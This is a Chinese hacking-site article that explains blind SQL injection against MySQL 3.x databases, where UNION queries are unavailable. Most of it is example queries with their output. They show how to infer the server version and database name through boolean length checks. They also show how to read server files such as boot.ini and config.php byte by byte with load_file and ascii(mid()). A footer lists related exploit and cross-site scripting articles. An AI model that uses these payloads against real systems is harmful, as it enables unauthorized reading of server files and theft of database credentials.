关于mysql 3.0的注射的一点思路

所属分类: 实用技巧 / 漏洞研究 阅读数: 1615
收藏 0 赞 0 分享
mysql 3.0的注射  

对mysql的注射主要是靠union 的联合查询,但union只对版本4。0以上的有用,对3。0以下的就没用了。。。。。。。。。。  

所以在mysql 3.0的数据库里没办法使用union进行跨表查询,但可以使用load_file  
但是也不可以直接使用union替换出来。 下面就是我的一点思路:  

得到版本:  
mysql> select * from user where userid=1 and length(version())<10;  
Empty set (0.00 sec)  

mysql> select * from user where userid=1 and length(version())<1777;  
+--------+----------+----------+  
| userid | username | password |  
+--------+----------+----------+  
| 1 | angel | mypass |  
+--------+----------+----------+  
1 row in set (0.00 sec)  

得到当前数据库:  
mysql> select * from user where userid=1 and length(database())>0;  
+--------+----------+----------+  
| userid | username | password |  
+--------+----------+----------+  
| 1 | angel | mypass |  
+--------+----------+----------+  
1 row in set (0.00 sec)  

暴取文件代码:  
mysql> select * from user where userid=1 and ascii(mid(load_file('c:/boot.ini'),1,1))<1;  
Empty set (0.05 sec)  

mysql> select * from user where userid=1 and ascii(mid(load_file('c:/boot.ini'),1,1))>1;  
+--------+----------+----------+  
| userid | username | password |  
+--------+----------+----------+  
| 1 | angel | mypass |  
+--------+----------+----------+  
1 row in set (0.00 sec)  

因为工作量大,可以用程序来实现(不过也很麻烦)  
另外思路: 可以先使用字符处理函数得到"特殊字符的位置",如我们暴的是config.php文件我们就可以选取"localhost"(或其他)为特殊字符,先得到所在的位置(在哪个字节),在去猜它附近的,这样可以省去不少工作量。  
更多精彩内容其他人还在看

DVBBS7.0Sp2前台提权漏洞利用程序[Kendy版]源码

DVBBS7.0Sp2前台提权漏洞利用程序[Kendy版]源码
收藏 0 赞 0 分享

跨站脚本攻击+Cookies欺骗(Discuz篇)

跨站脚本攻击+Cookies欺骗(Discuz篇)
收藏 0 赞 0 分享

Dvbbs7.1.0 cookie存在泄露绝对路径漏洞

Dvbbs7.1.0 cookie存在泄露绝对路径漏洞
收藏 0 赞 0 分享

关于对SQL注入80004005 及其它错误消息分析

关于对SQL注入80004005 及其它错误消息分析
收藏 0 赞 0 分享

针对蓝牙PIN码的最新攻击技术细节分析

针对蓝牙PIN码的最新攻击技术细节分析
收藏 0 赞 0 分享

细说3721网络实名“病毒”

细说3721网络实名“病毒”
收藏 0 赞 0 分享

浅谈SQL SERVER数据库口令的脆弱性

浅谈SQL SERVER数据库口令的脆弱性
收藏 0 赞 0 分享

MSHTA漏洞为黑客大开远程控制之门(图)

MSHTA漏洞为黑客大开远程控制之门(图)
收藏 0 赞 0 分享

再探九酷网络个人主页空间管理系统

再探九酷网络个人主页空间管理系统
收藏 0 赞 0 分享

黑客突破防火墙常用的几种技术

黑客突破防火墙常用的几种技术
收藏 0 赞 0 分享
查看更多